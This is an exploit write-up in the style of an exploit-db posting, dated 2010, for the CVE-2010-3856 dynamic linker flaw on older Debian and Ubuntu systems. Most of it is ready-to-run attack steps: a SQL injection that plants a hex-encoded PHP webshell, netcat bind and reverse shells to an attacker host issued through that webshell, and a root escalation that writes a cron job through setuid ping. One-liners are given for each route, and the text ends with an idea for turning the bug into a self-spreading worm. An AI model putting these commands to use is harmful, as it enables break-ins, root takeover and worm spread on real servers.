Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root

Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root# Exploit Title:Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root# Date: 24-10-2010# Author: jmit# Mail: fhausberger[at]gmail[dot]com # Tested on: Debian 5.0.6# CVE:CVE-2010-3856--------------| DISCLAIMER |--------------# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE# POSSIBILITY OF SUCH DAMAGE.--------- | ABOUT |---------Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).See (http://www.exploit-db.com/exploits/15304/). Should work on other linuxdistros too.--------------| BACKGROUND |--------------Typically it isn't possible to use a suidshell or modify /etc/passwd directly afterwebshell access (user nobody) to gain root access. But with the DSO vuln we canlaunch commands as root and we can create a socket and connect to the user or setupa bindshell.----------- | EXPLOIT |-----------After you have found a SQL-Injection vuln you can create a php backdoor. This is typicallypossible with select into dumpfile/outfile statement. The values are a simple backdoor.---DROP TABLE IF EXISTS `fm`;CREATE TABLE `fm` (`fm` longblob) TYPE=MyISAM;insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';drop table fm;flush logs;---Now you can connect to the server and create a connection with telnet, nc, writebinary with perl -e ' print "/x41/x42/x43/x44"', echo -en '/x41/x42/x43/x44', ...If direct shell access isn't possible you can use phpcode to create your ownbinary with php fwrite:------Now use Bind-Shell:http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bashReverse-Shell:http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bashin your webbrowser and connect to your shell$ nc victimip 9999iduid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)---Now lets exploit the DSO vuln. You need umask 0 for correctrw-rw-rw creation of exploit /etc/cron.d/exploit$ umask 0This is the shellscript for the cron.d entry.Bind-Shell:$ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.shReverse-Shell:$ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.shNow make your shellscript executable for cron:$ chmod u+x /tmp/exploit.shCreate rw-rw-rw file in cron directory using the setuid ping program:$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" pingLaunch every minute a suid root shell$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploitNow you have a root shell every minute.$ nc attackerip 79iduid=0(root) gid=0(root) groups=0(root)-------------------| EXPLOIT oneline |-------------------echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit$ nc attackerip 79iduid=0(root) gid=0(root) groups=0(root)------------------------------| EXPLOIT from webshell only |------------------------------http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.shhttp://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.shhttp://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" pinghttp://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit$ nc attackerip 79iduid=0(root) gid=0(root) groups=0(root)---------------------------------| EXPLOIT from webshell oneline |---------------------------------http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit$ nc attackerip 79iduid=0(root) gid=0(root) groups=0(root)---------| IDEAS |---------Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs.Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.© Offensive Security 2010